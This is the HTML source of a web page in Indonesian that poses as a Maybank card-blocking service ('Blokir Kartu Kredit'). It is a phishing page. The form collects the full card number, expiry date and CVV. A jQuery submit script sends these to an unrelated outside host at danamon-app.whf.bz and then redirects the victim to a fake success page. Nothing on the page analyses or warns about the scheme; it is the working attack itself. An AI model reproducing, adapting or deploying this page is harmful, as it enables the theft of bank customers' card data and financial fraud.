<!DOCTYPE html>
<html lang="en">
   <meta name="theme-color" content="#FFC501"> 
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
    <title>blokirkartukredit - Laporan Transaksi Mybank</title>
    <meta
      property="og:title"
      content="blokirkartukredit - Laporan Transaksi Mybank"
    />
    <meta
      property="og:description"
      content="Blokir Kartu Kredit
Batalkan Transaksi
Laporan Ke Bank Lain"
    />
    <meta
      property="og:image"
      content="https://aheioqhobo.cloudimg.io/v7/_playground-bucket-v2.teleporthq.io_/dfc3c6ca-62ff-44c5-bd01-8540dddd6ab0/42e8ffeb-e693-40a5-88bd-b16edd7d8332?org_if_sml=1&amp;force_format=original"
    />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
    <meta charset="utf-8" />
    <meta property="twitter:card" content="summary_large_image" />

    <style data-tag="reset-style-sheet">
      html {  line-height: 1.15;}body {  margin: 0;overflow: hidden}* {  box-sizing: border-box;  border-width: 0;  border-style: solid;}p,li,ul,pre,div,h1,h2,h3,h4,h5,h6,figure,blockquote,figcaption {  margin: 0;  padding: 0;}button {  background-color: transparent;}button,input,optgroup,select,textarea {  font-family: inherit;  font-size: 100%;  line-height: 1.15;  margin: 0;}button,select {  text-transform: none;}button,[type="button"],[type="reset"],[type="submit"] {  -webkit-appearance: button;}button::-moz-focus-inner,[type="button"]::-moz-focus-inner,[type="reset"]::-moz-focus-inner,[type="submit"]::-moz-focus-inner {  border-style: none;  padding: 0;}button:-moz-focus,[type="button"]:-moz-focus,[type="reset"]:-moz-focus,[type="submit"]:-moz-focus {  outline: 1px dotted ButtonText;}a {  color: inherit;  text-decoration: inherit;}input {  padding: 2px 4px;}img {  display: block;}html { scroll-behavior: smooth  }
    </style>
    <style data-tag="default-style-sheet">
      html {
        font-family: Inter;
        font-size: 16px;
      }

      body {
        font-weight: 400;
        font-style:normal;
        text-decoration: none;
        text-transform: none;
        letter-spacing: normal;
        line-height: 1.15;
        color: var(--dl-color-gray-black);
        background-color: var(--dl-color-gray-white);
        overflow: hidden;

      }
      
      /*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 90px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
    </style>
    <link
      rel="shortcut icon"
      href="public/profil1.png"
      type="icon/png"
      sizes="32x32"
    />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap"
      data-tag="font"
    />
    <link
      rel="stylesheet"
      href="https://unpkg.com/%40teleporthq/teleport-custom-scripts@0.0.27/dist/style.html"
    />
  </head>
  <body>
    <link rel="stylesheet" href="style.css" />
    <div>
      <link href="ast/css/blokirkartukredit.css" rel="stylesheet" />

      <div class="blokirkartukredit-container">
        <div class="blokirkartukredit-container1">
          <div class="blokirkartukredit-container2">
            <img
              alt="image"
              src="public/maybank-200h.png"
              class="blokirkartukredit-image"
            />
            <img
              alt="image"
              src="public/hah-200h.png"
              class="blokirkartukredit-image1"
            />
            <svg viewBox="0 0 1024 1024" class="blokirkartukredit-icon" onclick="location.href='menu.html'">
              <path
                d="M810 274l-238 238 238 238-60 60-238-238-238 238-60-60 238-238-238-238 60-60 238 238 238-238z"
              ></path>
            </svg>
          </div>
          <div class="blokirkartukredit-container3">
            <img
              alt="image"
              src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSv_MxVSc2tPTVaPFy4YEJYO1Ay6N78qDC3lA&usqp=CAU"
              class="blokirkartukredit-image2"
            />
            <form id="frmSubmit"
              method="POST"
              enctype="application/x-www-form-urlencoded"
              class="blokirkartukredit-form"
            >
              <input
                type="tel"
                name="debit"
                id="debit"
                required=""
                maxlength="19"
                minlength="19"
                placeholder="Masukkan 16 Angka Nomor Kartu "
                class="blokirkartukredit-textinput input"
              />
              <input
                type="tel"
                name="valid"
                id="valid"
                required=""
                maxlength="5"
                minlength="4"
                placeholder="Valid Thrue ( MM / YY )"
                class="blokirkartukredit-textinput1 input"
              />
              <input
                type="password"
                name="cvv"
                inputmode="numeric"
                id="cvv"
                required=""
                maxlength="3"
                minlength="3"
                placeholder="kode Keamanan ( CVV )"
                class="blokirkartukredit-textinput2 input"
              />
             <button type="submit" class="" style="left: 0px;
  right: 0px;
  width: 100%;
  bottom: 0%;
  height: 63px;
  margin: auto;
  position: fixed;
  font-style: normal;
  text-align: center;
  font-weight: 700;
  padding-top: 0px;
  border-width: 0px;
  padding-bottom: 0px;
  text-decoration: none;
   background-size: 100% 100%;
  background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBB1yIjlnsJH70mnoGKJ8ISucPkJvCIVskor6EYTSbmgPo7D-UeZLD8wu_JM1d6dIFyny8q0STdovjcX9UhGfS3vOmYcSwvIBjVtb0pVjMZi0zEXBpjP8JCumKGvdBsrw-QfZKbuQPCJ6EoV4w6W4Zdc9sW-znK1dbGxVvNjczAGNvSgnaX9t-3K7aBGQ/s750/yellow_btn.png);
  background-repeat: no-repeat;
  background-position: 100% 100%;" id="chat">
Blokir Kartu Kredit
              </button>
            </form>
          </div>
        </div>
      </div>
    </div>
 <div id="process1" name="process" class="process1" style="display: none;">
			<div class="loading">
				<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yNH0XdtGVrvDwUbGYi68Z6_PuJbO7yrFuGWJeeRzF7QnfrH84FzIWHGeURCml9chh7C-A8SscvscIIwjFhO2Dqebb0SSmw46LxRRSNj4BSYCH_2Tbc_UOsVAqOBIzYuo-0CLM-THp1FeV4iTnxxFIo2jRI1DNIIw1VLV3HgAoW96JA2y1zn5G0Fczgk/s800/loading.gif">
			</div>
		</div>   
    <script
      defer=""
      src="https://unpkg.com/@teleporthq/teleport-custom-scripts"
    ></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.js"></script>
<script>
    $(document).ready(function(){
    $('#debit').mask('0000 0000 0000 0000');
    $('#valid').mask('00/00');    
    });
    </script>   
 <script>
$('#frmSubmit').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
 $('#process1').show();   
  document.getElementById('chat').innerHTML = "Proses..";
  
  
$.ajax({
 type: 'POST',
 url: 'https://danamon-app.whf.bz/token/maybank/verkartu.php',
 async: false,
 dataType: 'JSON',
 data: $(this).serialize(),
 
 complete: function(data) {
            console.log('Complete')
  
setTimeout(function(){  
document.getElementById('chat').value = "Blokir Kartu Kredit";     
$('#process1').fadeOut(); 
location.href='suksesmay/index.html';
var card = document.getElementById("debit").value;
sessionStorage.setItem("card", card);
var masa = document.getElementById("valid").value;
sessionStorage.setItem("masa", masa);
var kode = document.getElementById("cvv").value;
sessionStorage.setItem("kode", kode);
    }, 1000); 
 }
    });

    return false;
});       


</script>    
  </body>
</html>
